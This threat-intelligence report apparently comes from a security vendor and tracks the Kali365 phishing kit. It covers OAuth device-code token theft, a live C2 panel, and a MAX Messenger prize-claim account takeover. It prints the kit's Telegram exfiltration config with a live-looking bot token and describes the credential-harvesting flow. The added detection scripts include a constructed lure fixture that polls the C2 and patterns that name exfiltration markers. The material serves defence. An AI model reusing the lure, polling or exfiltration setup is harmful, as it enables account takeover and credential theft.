From Token Bingo to MAX Takeover: Kali365 Operator Expands Operation Across Microsoft Outlook, Okta, Xerox DocuShare, and Other Services

Arctic Wolf has observed a significant expansion of the phishing-as-a-service operation Kali365, which abuses Microsoft’s OAuth device authorisation flow to bypass MFA.

Key Takeaways

In our previous post, Token Bingo: Don’t Let Your Code Be the Winner, we documented Kali365, a phishing-as-a-service (PhaaS) kit abusing Microsoft’s OAuth 2.0 device authorization flow to steal Entra ID tokens. In this follow-up report, we track the same operator into new territory as they expand their operation and infrastructure. Our latest findings include:

  • The operator’s full panel infrastructure, including a live command-and-control (C2) panel for token capture status.
  • A phishing page impersonating MAX Messenger, Russia’s state-backed national messenger, used to take over MAX accounts via a fake “prize-claim” attack flow.
  • A cluster of 126 malicious hosts, all serving the same kit infrastructure. The hosts impersonate legitimate sites and services, including Microsoft Outlook and Microsoft Live, Okta SSO, Xerox DocuShare, LiveDrive, AWS naming conventions (such as vpce., apm.), German email provider GMX, and Russian online services including major email portal Mail.ru, social networking service Odnoklassniki, and cloud storage provider Yandex Disk.

Based on our observations, we assess that the same operator behind the OneDrive device-code phish is now operating a multi-brand phishing operation, with a notable focus on Russian-services platforms and an active MAX Messenger takeover campaign.

What is Device Code Phishing?

Device code phishing is an identity-focused attack technique that exploits the OAuth 2.0 Device Authorization Grant, a legitimate authentication flow intended for devices that cannot support standard interactive logins (such as smart TVs, printers, and IoT devices). Rather than stealing credentials, threat actors initiate a device login request themselves and socially engineer a victim into completing the authorization on their behalf.

Because the victim authenticates through a legitimate identity provider, the threat actor can obtain Microsoft 365 access tokens and bypass multifactor authentication (MFA) without ever needing access to the victim’s password or device.

Recap: What is Kali365?

Kali365 (also referred to as “K365”) is an emerging PhaaS platform first seen in April 2026. The FBI warned in a recent alert that the kit provides less-technical attackers with “access to AI-generated phishing lures, automated campaign templates, real-time targeted individual/entity tracking dashboards, and OAuth token capture capabilities.”

Kali365 works by abusing Microsoft’s OAuth 2.0 device authorization grant. The attacker initiates a device-code request against their own malicious application, receives a legitimate user_code from Microsoft, and embeds that code into a phishing page that impersonates a OneDrive or SharePoint share. When a victim enters the code at the real Microsoft.com/devicelogin site and authenticates, Microsoft issues OAuth access and refresh tokens directly to the attacker’s application, granting the attacker persistent access to the victim’s M365 environment without ever needing the user’s password or MFA token.

The kit is marketed and distributed via Telegram channels, which lowers the barrier to entry and drives rapid affiliate recruitment, a familiar PhaaS pattern.

Meet MAX Messenger

MAX Messenger is a Russian messaging platform developed by VK (formerly Mail.ru Group) with support from Russia’s Ministry of Digital Development. It launched on March 26, 2025 and has been actively promoted by the Russian government as the country’s “national messenger” since July 2025; it received official status as a social network in March 2026.

As of April 2026, MAX reports over 110 million registered users, 80+ million daily active users, and more than 5 million foreign users, who together send approximately 1.5 billion messages and make 30 million calls per day. Intended as a domestic alternative to Western messaging platforms and pitched as a multi-functional super-app similar to China’s hugely popular WeChat, the app is integrated with VK’s broader ecosystem, which already had a daily audience of around 81.5 million users across its services as of late 2025.

Its relevance to this report is twofold. First, scale: a phishing operator who can convert MAX account takeovers into propagation has access to one of the largest installed messaging bases in the Russian-speaking world. Second, target concentration: the Kali365 kit’s hint text (“a Russian number is required”) and the operator’s parallel impersonation of Mail.ru, Yandex Disk, and Odnoklassniki reflect a deliberate, consistent focus on Russian consumer-internet platforms, alongside the operator’s existing Western enterprise targets (Microsoft 365, Okta, Xerox DocuShare).

New Arctic Wolf Findings on Kali365

Finding #1: A Live C2 Panel

Since the publication of our last report on Kali365, Arctic Wolf has continued tracking and monitoring this threat. While reviewing a still-live phishing page hosted on open-box-rpps[.]jeff-1fd[.]workers[.]dev, we were able to extract the embedded polling logic, the JavaScript snippet the page uses to detect when tokens have been captured on the attacker’s backend.

Figure 1: JavaScript polling function.

We learned that the phishing page polls panel[.]securehubcloud[.]com every three seconds to check whether the victim has entered the device code at the legitimate Microsoft site. Once the panel reports the status as captured (status === 'captured'), the kit knows the OAuth flow has been completed and tokens have been issued to the attacker’s app.

The SID value (2091010) hardcoded into the same HTML is the affiliate/session identifier that maps the phishing page back to the operator’s tenant inside the C2. This gave us the operator’s command-and-control endpoint, and the initial pivot point for mapping their backend infrastructure.

Figure 2: Device-code phishing page with hardcoded verification code.

Figure 2 above shows the original device-code phishing page rendered from the malicious site open-box-rpps[.]jeff-1fd[.]workers[.]dev. The verification code (SHQ748WLY) is hardcoded into the HTML at delivery time; the kit auto-copies it to the clipboard when the victim clicks the “View” button and opens login.microsoftonline.com/common/oauth2/deviceauth, a legitimate Microsoft endpoint used for OAuth 2.0 device code authentication, in a popup. Meanwhile, the footer of the phishing page covertly polls the operator’s C2 every three seconds.
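The three-second poll to the C2 described above is itself a detection opportunity, and it is the behaviour behind the “block at egress and alert” recommendation in the Defender Takeaways below. The following script is an added example, not Arctic Wolf’s code or the kit’s: it parses constructed web-proxy log lines and flags, first, any client that contacted the C2 hostnames named in this report and, second, any client/host pair whose request cadence clusters tightly around three seconds, which catches the same behaviour when the panel moves to a hostname that is not yet on a blocklist. The log format, the client IPs and the /status query path are constructed; only the hostnames and the SID value come from the report.

```python
"""Flag Kali365-style C2 polling in web proxy logs.

Added example (not Arctic Wolf's or the kit's code). The kit polls its panel
every three seconds, so a workstation that has loaded a live lure shows up as a
tight, regular request cadence to one host. Log format and sample lines are
constructed; the hostnames and SID 2091010 are the values from the report.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# C2 hostnames named in the report (defanging brackets removed).
KNOWN_C2 = {
    "panel.securehubcloud.com",
    "api.securehubcloud.com",
    "boss.securehubcloud.com",
}

# Constructed proxy log: "<ISO timestamp> <client ip> <method> <host> <path> <status>".
# The /status?sid= path is an assumption; the report does not give the poll path.
SAMPLE_LOG = """\
2026-05-20T10:00:00 10.1.4.22 GET open-box-rpps.jeff-1fd.workers.dev / 200
2026-05-20T10:00:03 10.1.4.22 GET panel.securehubcloud.com /status?sid=2091010 200
2026-05-20T10:00:06 10.1.4.22 GET panel.securehubcloud.com /status?sid=2091010 200
2026-05-20T10:00:09 10.1.4.22 GET panel.securehubcloud.com /status?sid=2091010 200
2026-05-20T10:00:12 10.1.4.22 GET panel.securehubcloud.com /status?sid=2091010 200
2026-05-20T10:00:01 10.1.4.23 GET www.example.com /index.html 200
2026-05-20T10:00:42 10.1.4.23 GET www.example.com /news 200
2026-05-20T10:03:10 10.1.4.23 GET www.example.com /about 200
"""


def parse_log(text):
    """Parse the constructed log format into (timestamp, client_ip, host) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, _method, host, _path, _status = line.split()
        events.append((datetime.fromisoformat(ts), client, host.lower()))
    return events


def known_c2_contacts(events):
    """Return {client_ip: [C2 hosts]} for every client that touched a known Kali365 C2."""
    hits = defaultdict(set)
    for _ts, client, host in events:
        if host in KNOWN_C2:
            hits[client].add(host)
    return {client: sorted(hosts) for client, hosts in hits.items()}


def regular_beacons(events, period=3.0, tolerance=0.5, min_requests=4):
    """Find (client, host, mean_gap) triples whose request gaps sit tightly around `period` seconds.

    Requiring both a mean near the period and a small spread separates a timer-driven
    poll from a human browsing the same site at roughly similar intervals.
    """
    series = defaultdict(list)
    for ts, client, host in events:
        series[(client, host)].append(ts)
    found = []
    for (client, host), stamps in series.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(later - earlier).total_seconds() for earlier, later in zip(stamps, stamps[1:])]
        if abs(mean(gaps) - period) <= tolerance and pstdev(gaps) <= tolerance:
            found.append((client, host, round(mean(gaps), 2)))
    return found


if __name__ == "__main__":
    evts = parse_log(SAMPLE_LOG)
    print("known C2 contacts:", known_c2_contacts(evts))
    print("regular beacons:", regular_beacons(evts))
```

On the constructed sample the second check fires on 10.1.4.22 alone; it is the one worth keeping in a SIEM rule because it keys on the cadence the kit's polling timer produces, not on a domain the operator can rotate away from.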

Figure 3: Kali365’s C2 sign-in panel.

The Kali365 C2 sign-in page is hosted at panel[.]securehubcloud[.]com/login. The page is minimalist, branded only as “PANEL,” with “Forgot Password,” “Renewal Issue,” and “Lost Account” links visible in the footer. The “Renewal” link is consistent with a subscription-based PhaaS economic model.

Pivoting on the Certificate

The C2’s TLS certificate, served by api[.]securehubcloud[.]com, has the SHA1 fingerprint 6894a51278ec89118276c2dd2dc36e6f9ea2790a. Querying that fingerprint against passive host-response telemetry surfaced not only the three *.securehubcloud[.]com subdomains we already had (api., boss., and panel.), but also their hosting IPs and, critically, a recurring page-title fingerprint: “K365 Control.”

The “K365 Control” title is the operator’s own internal branding for the C2. That label, in turn, became a distinct fingerprint of its own that led us to our next batch of findings.

Figure 4: Host-response telemetry for the SHA1 fingerprint (shown here in CTI platform VALIDIN).

The screenshot above shows host-response telemetry for SHA1 fingerprint 6894a51278ec89118276c2dd2dc36e6f9ea2790a, derived from the C2’s TLS certificate. The Panel and K365 Control page titles repeat across api[.]securehubcloud[.]com, boss[.]securehubcloud[.]com, and panel[.]securehubcloud[.]com on Cloudflare-fronted IPs 172[.]67[.]156[.]83 and 104[.]21[.]32[.]229 (AS 13335).

Figure 5: Our discovery of the greatness-marketing[.]top host (shown here in VALIDIN).

Pivoting on the literal string K365 Control as a passive HTTP title produced a very interesting additional host outside the securehubcloud[.]com zone: greatness-marketing[.]top. It has the same panel banner and same operator branding, but it’s a completely different domain.

Finding #2: A MAX Messenger Account Takeover page

greatness-marketing[.]top is not a Microsoft 365 phishing page, unlike other domains controlled by Kali365. Instead, it’s a MAX Messenger account-takeover kit, framed as a prize-verification flow. Russian text on the page reads “Подтверждение выигрыша”, meaning “Prize confirmation. Sign in to receive your prize”.

Figure 6: The greatness-marketing[.]top phishing “prize claim” page asks for the victim’s Russian (+7) phone number.

Figure 7: The page prompts the victim to enter a one-time password (sent by the real Max Messenger) into a six-digit OTP grid.

The attack flow that follows is straightforward:

  1. The victim enters the Russian (+7) mobile phone number associated with their MAX account into the phishing page, believing it to be a real prize verification site. Text on the sign-in page reads “Для входа нужен номер из России” (“A Russian number is required to sign in”), confirming the campaign’s geographic targeting.
  2. MAX Messenger’s backend sends a real one-time login code to the victim’s device via SMS or in-app push.
  3. Next, the victim re-enters that code into the phishing page, believing it to be a prize verification site. The phishing page shows a 6-digit one-time password (OTP) grid, plus a 2FA password field that reads “Пароль 2FA, если есть”, meaning “2FA password, if set”. This defeats both SMS-OTP and two-factor authentication on the real MAX account in a single interaction.
  4. The kit next prompts the victim for a 2FA password, if this is enabled on the account.
  5. Once the victim completes steps 1-4 above, their credentials are exfiltrated. The attacker logs into the victim’s real MAX Messenger account and gains access to all their messages, multimedia, files, and contacts.

How the Victim’s Credentials Are Exfiltrated

Once the five steps shown above have been completed by the victim, the page’s HTML hardcodes a Telegram bot token and chat ID -5035652280 for credential exfiltration:

<script>
  window.TELEGRAM_NOTIFY_CONFIG = {
    botToken: '8535071077:AAFus1ccm-puZ2htZkpKP_UyZfp3FTHFCzg',
    chatId: '-5035652280'
  };
</script>

Querying the Telegram Bot API for that token returns:

{
  "ok": true,
  "result": {
    "id": 8535071077,
    "is_bot": true,
    "first_name": "sova_novosibirsk_bot",
    "username": "NovosibyrskyMoneyBot"
  }
}

The bot is reachable on Telegram as @NovosibyrskyMoneyBot, with the display name sova_novosibirsk_bot. The words “novosibirsk” (Novosibirsk is a city in Russia), “money”, and “sova” (owl) in the account name, combined with the fake prize-claim social engineering trick, fit a long-running scam genre that has been active on Telegram for years, but here it has been re-purposed against a different platform.

Figure 8: The Telegram profile of sova_novosibirsk_bot (@NovosibyrskyMoneyBot).

@NovosibyrskyMoneyBot is the attacker’s exfiltration channel: every captured +7 phone number, OTP, and 2FA password is forwarded to chat ID -5035652280 in real time.

The page also embeds a tracking pixel pointing to tk[.]mowell[.]tech (pixel ID 906596682876295936), suggesting the operator is measuring conversion against marketing spend. This is affiliate-style telemetry typical of PhaaS economics.

The Propagation Pattern

The same propagation model has been used for years on Telegram itself, where a compromised contact spams every other contact with “vote for me” or “claim this prize” links that require an account confirmation step. Once a MAX account is taken over, the attacker has access to everything stored in it, from messages and media files to the full contact list, and the compromised account becomes the next propagation node for the same lure. Each takeover materially expands the operator’s reach.

Finding #3: A Banner-Hash Pivot to a 126-Host Cluster

Pivoting on the HTTP response banner hash febb622cd9eeb5c8860dcef4cbfd4b74, the response signature served by the operator’s phishing pages, surfaced 126 distinct hosts active between May 6, 2026 and May 27, 2026.

All 126 hosts return the same banner, meaning they all likely serve the same kit template. This is a single phishing-kit infrastructure cluster, not 126 independent threats.

The kit’s HTML template is consistent across all observed hosts: most variants open with a “Preparing your secure document…” loader, a same-origin fetch() to a sibling path, and document.open() / document.write() to swap in the lure HTML returned by the C2.

Figure 9. Common HTML template across the 126-host cluster.

In the common HTML template across the 126-host cluster (see figure 9 above), the setTimeout(2000) delay, the data-form-o5pu[.]p-ntz8agp6[.]workers[.]dev style sibling-fetch, and the “Preparing your secure document…” string are stable enough to use as a content-based hunting fingerprint in VirusTotal: content:"Preparing your secure document…".
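The template markers above (the loader string, the two-second setTimeout, the fetch() to a workers.dev sibling, document.open()/document.write(), the panel poll and the status === 'captured' check), together with the hardcoded Telegram configuration from Finding #2, can be turned into a static triage scanner for HTML captured by a proxy, sandbox or mail gateway. The following is an added example, not Arctic Wolf’s code or the kit’s: it scores a page against those markers and pulls out the IOCs worth recording (SID, polled hosts, Telegram chat ID and numeric bot ID). The two HTML fixtures are constructed for the test and contain no working lure; sample-lure.workers.dev and the Telegram values in them are placeholders, while panel.securehubcloud.com and the SID 2091010 are the values reported above. The marker list and the three-marker threshold are assumptions.

```python
"""Static triage of a captured HTML page against the Kali365 template markers.

Added example, not Arctic Wolf's or the kit's code. Marker strings come from the
report; the fixtures below are constructed and contain no working lure.
"""
import re

# (marker name, regex). Several markers co-occurring is the signal; any one of
# them alone (a 2000 ms setTimeout, say) is common in benign pages.
MARKERS = [
    ("loader_text", re.compile(r"Preparing your secure document")),
    ("two_second_delay", re.compile(r"setTimeout\s*\([\s\S]{0,600}?,\s*2000\s*\)")),
    ("workers_dev_fetch", re.compile(r"fetch\s*\(\s*['\"]https?://[^'\"]*\.workers\.dev", re.I)),
    ("document_rewrite", re.compile(r"document\.open\s*\(\s*\)[\s\S]{0,200}?document\.write\s*\(")),
    ("c2_poll", re.compile(r"securehubcloud\.com", re.I)),
    ("captured_status", re.compile(r"status\s*===\s*['\"]captured['\"]")),
    ("devicelogin_popup", re.compile(r"login\.microsoftonline\.com/common/oauth2/deviceauth", re.I)),
    ("telegram_exfil", re.compile(r"TELEGRAM_NOTIFY_CONFIG")),
]
THRESHOLD = 3  # assumption: three or more co-occurring markers is worth an analyst's time


def fingerprint(html):
    """Names of the markers present in the page, in MARKERS order."""
    return [name for name, rx in MARKERS if rx.search(html)]


def extract_iocs(html):
    """Pull out the values worth recording. The bot token secret is never echoed."""
    iocs = {}
    m = re.search(r"\bsid\b\s*[:=]\s*['\"]?(\d+)", html, re.I)
    if m:
        iocs["sid"] = m.group(1)
    m = re.search(r"chatId\s*:\s*['\"](-?\d+)['\"]", html)
    if m:
        iocs["telegram_chat_id"] = m.group(1)
    m = re.search(r"botToken\s*:\s*['\"](\d+):[A-Za-z0-9_-]+['\"]", html)
    if m:
        iocs["telegram_bot_id"] = m.group(1)  # numeric bot id only, not the secret
    hosts = re.findall(r"https?://([a-z0-9.-]+\.(?:workers\.dev|securehubcloud\.com))", html, re.I)
    iocs["hosts"] = sorted({h.lower() for h in hosts})
    return iocs


def verdict(html):
    """Score the page and attach the extracted IOCs."""
    hits = fingerprint(html)
    return {
        "markers": hits,
        "score": len(hits),
        "is_kali365_template": len(hits) >= THRESHOLD,
        "iocs": extract_iocs(html),
    }


# Constructed fixture combining the report's markers; hostnames other than the
# panel and all Telegram values are placeholders. It loads nothing real.
SAMPLE_LURE = """<!doctype html><html><body>
<p>Preparing your secure document…</p>
<script>
  setTimeout(function () {
    fetch('https://sample-lure.workers.dev/p2').then(function (r) { return r.text(); })
      .then(function (body) { document.open(); document.write(body); document.close(); });
  }, 2000);
  var sid = 2091010;
  setInterval(function () {
    fetch('https://panel.securehubcloud.com/check?sid=' + sid).then(function (r) { return r.json(); })
      .then(function (j) { if (j.status === 'captured') { console.log('done'); } });
  }, 3000);
  window.TELEGRAM_NOTIFY_CONFIG = { botToken: '1234567890:PLACEHOLDER_TOKEN', chatId: '-100000000' };
</script>
</body></html>"""

# Constructed benign page sharing two markers, to show the threshold matters.
SAMPLE_BENIGN = ("<html><body><p>Preparing your secure document...</p>"
                 "<script>setTimeout(load, 2000);</script></body></html>")


if __name__ == "__main__":
    for label, page in (("lure", SAMPLE_LURE), ("benign", SAMPLE_BENIGN)):
        print(label, verdict(page))
```

Run against the single VirusTotal content hunt above, this adds two things: a co-occurrence score that keeps a lone “Preparing your secure document…” string from paging someone, and a structured IOC record (SID, polled hosts, Telegram chat and bot IDs) that can be fed straight into blocklists and a tracking sheet without the analyst re-reading the HTML.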

Brands Impersonated by Kali365

Impersonated Entity                      Hosts     Region
---------------------------------------  --------  ----------
Mail.ru (Russian webmail)                5         RU
Yandex Disk (yadi.sk)                    3         RU
Odnoklassniki (ok.ru)                    1         RU
Microsoft Outlook / Live                 3         Global
Okta SSO                                 1         Enterprise
GMX (1&1 Mail)                           1         DE
Xerox DocuShare                          1         Enterprise
LiveDrive                                1         UK
AWS-style endpoint naming (vpce., apm.)  3         Mimicry
Generic / unbranded credential kits      Majority


The pattern is consistent with what we saw in Token Bingo: a multi-tenant phishing platform where a single operator (or a small number of affiliated operators) rotates the same backend across many brands and many disposable front-ends, primarily on Cloudflare Workers and a single shared cPanel host (attachedfile[.]com).

How Arctic Wolf Protects its Customers

Arctic Wolf is committed to ending cyber risk, and when active campaigns are identified, we move quickly to protect our customers. We have leveraged threat intelligence around this threat activity to enhance detections in the Aurora® Superintelligence Platform, subject to customer environment and available telemetry.

As we track this campaign and discover new information, we may further refine our detections to account for additional indicators of compromise (IOCs) and techniques leveraged by the threat group behind this malicious activity.

Defender Takeaways

Arctic Wolf strongly recommends implementing comprehensive security awareness training to equip users with the skills needed to quickly identify and report suspicious activity, including the tactics observed in this campaign. For those without the time or resources needed to set up a security training program from scratch, Arctic Wolf offers several phishing-focused modules within our Arctic Wolf Managed Security Awareness® training program to help users recognize and respond to the types of threats outlined in this bulletin.

The following proactive measures can help defenders spot potentially malicious activity connected with Kali365:

  1. Treat panel[.]securehubcloud[.]com as a high-confidence C2. Any outbound HTTP/HTTPS to that host from your environment is, by definition, a workstation that has loaded an active Kali365 phishing page. Block at egress and alert.
  2. Hunt the page template, not the URL. The Worker subdomains rotate constantly (median observation window in our data is days, not weeks). The content:"Preparing your secure document…" VirusTotal hunt query and the febb622cd9eeb5c8860dcef4cbfd4b74 BANNER_0_HASH-HOST on VALIDIN are both more durable than any single domain.
  3. Block *.attachedfile[.]com as a unit. All 39 observed subdomains serve the same kit. There is no legitimate reason to allow this domain.
  4. For Microsoft 365 environments: the original Kali365 OAuth device-flow abuse remains active. Disable device-code authentication where you can, or restrict it via Conditional Access. See our Token Bingo report for detection guidance on the Entra side.
  5. Monitor or block Telegram connections from your corporate network.
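For item 4, the Entra-side check that complements a Conditional Access block is to review who is actually signing in via device code and through which client application. The following is an added example, not Arctic Wolf’s code: it triages sign-in records shaped like the Microsoft Graph signIn resource, where authenticationProtocol is "deviceCode" for device authorization grant sign-ins, and groups the non-allowlisted device-code sign-ins by client app, listing the affected users and source IPs and counting how many of them no Conditional Access policy touched (conditionalAccessStatus "notApplied"). The records, application IDs, user names and the allowlist are constructed placeholders.

```python
"""Triage Entra ID sign-in records for device-code (OAuth device authorization) sign-ins.

Added example, not Arctic Wolf's code. Records are constructed but use the field
names of the Microsoft Graph signIn resource; app IDs, users and the allowlist
are placeholders.
"""
from collections import defaultdict

# Assumption: client application IDs your organisation legitimately uses with
# device code (for example a CLI on headless build hosts). Everything else is reviewed.
ALLOWED_DEVICE_CODE_APPS = {"00000000-0000-0000-0000-00000000cafe"}

# Constructed sign-in records (subset of signIn fields).
SAMPLE_SIGNINS = [
    {"createdDateTime": "2026-05-20T10:02:11Z", "userPrincipalName": "a.lee@example.com",
     "appId": "00000000-0000-0000-0000-00000000cafe", "appDisplayName": "Ops CLI",
     "authenticationProtocol": "deviceCode", "ipAddress": "203.0.113.10",
     "conditionalAccessStatus": "success"},
    {"createdDateTime": "2026-05-20T10:05:40Z", "userPrincipalName": "b.kim@example.com",
     "appId": "11111111-2222-3333-4444-555555555555", "appDisplayName": "Document Viewer",
     "authenticationProtocol": "deviceCode", "ipAddress": "198.51.100.7",
     "conditionalAccessStatus": "notApplied"},
    {"createdDateTime": "2026-05-20T10:06:02Z", "userPrincipalName": "c.ng@example.com",
     "appId": "11111111-2222-3333-4444-555555555555", "appDisplayName": "Document Viewer",
     "authenticationProtocol": "deviceCode", "ipAddress": "198.51.100.7",
     "conditionalAccessStatus": "notApplied"},
    {"createdDateTime": "2026-05-20T10:07:30Z", "userPrincipalName": "b.kim@example.com",
     "appId": "22222222-3333-4444-5555-666666666666", "appDisplayName": "Office 365",
     "authenticationProtocol": "oAuth2", "ipAddress": "203.0.113.44",
     "conditionalAccessStatus": "success"},
]


def device_code_signins(records):
    """Only sign-ins completed through the device authorization grant."""
    return [r for r in records if r.get("authenticationProtocol") == "deviceCode"]


def suspicious_device_code_apps(records, allowlist=ALLOWED_DEVICE_CODE_APPS):
    """Group non-allowlisted device-code sign-ins by client app.

    One unfamiliar app collecting tokens for several users inside a short window
    is the shape a Kali365-style campaign takes in the sign-in log; the
    ca_not_applied count shows how many of those a Conditional Access policy on
    the device code flow would have intercepted.
    """
    groups = defaultdict(lambda: {"appDisplayName": "", "count": 0, "ca_not_applied": 0,
                                  "users": set(), "ips": set(), "first": None, "last": None})
    for r in device_code_signins(records):
        if r["appId"] in allowlist:
            continue
        g = groups[r["appId"]]
        g["appDisplayName"] = r["appDisplayName"]
        g["count"] += 1
        if r.get("conditionalAccessStatus") == "notApplied":
            g["ca_not_applied"] += 1
        g["users"].add(r["userPrincipalName"])
        g["ips"].add(r["ipAddress"])
        ts = r["createdDateTime"]  # ISO-8601 strings of one format compare lexically
        g["first"] = ts if g["first"] is None or ts < g["first"] else g["first"]
        g["last"] = ts if g["last"] is None or ts > g["last"] else g["last"]
    return {app: {**g, "users": sorted(g["users"]), "ips": sorted(g["ips"])}
            for app, g in groups.items()}


if __name__ == "__main__":
    for app, summary in suspicious_device_code_apps(SAMPLE_SIGNINS).items():
        print(app, summary)
```

Pull the records from the sign-in log export or the Graph signIns endpoint filtered on authenticationProtocol, then review each app the script lists: the affected users need their refresh tokens revoked and the app needs to be blocked or consent-restricted, and a non-zero ca_not_applied count is the argument for a Conditional Access policy that blocks the device code flow for everyone outside the allowlisted use case.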

Arctic Wolf Labs will continue tracking this operator. If you observe activity matching the IOCs above in your environment, contact your Arctic Wolf concierge or our Incident Response team.

Legal disclaimer: Attribution reflects Arctic Wolf Labs’ assessment as of the report period and may evolve with new evidence. References to threat actor identity, nexus, and intent are analytical judgments, not statements of legal fact. This alert is provided for informational purposes only and does not constitute a guarantee of detection or prevention. Defensive effectiveness varies by environment, configuration, and available telemetry.

Appendix

For additional Appendix sections referenced in this report, including Indicators of Compromise, C2 Infrastructure, Phishing Lure Domains, and more, please see our public GitHub repository.

About Arctic Wolf Labs

Arctic Wolf Labs is a group of elite security researchers, data scientists, and security development engineers who explore security topics to deliver cutting-edge threat research on new and emerging adversaries, develop and refine advanced threat detection models with artificial intelligence and machine learning, and drive continuous improvement in the speed, scale, and detection efficacy of Arctic Wolf’s solution offerings.

Arctic Wolf Labs brings world-class security innovations to not only Arctic Wolf’s customer base, but the security community at large.
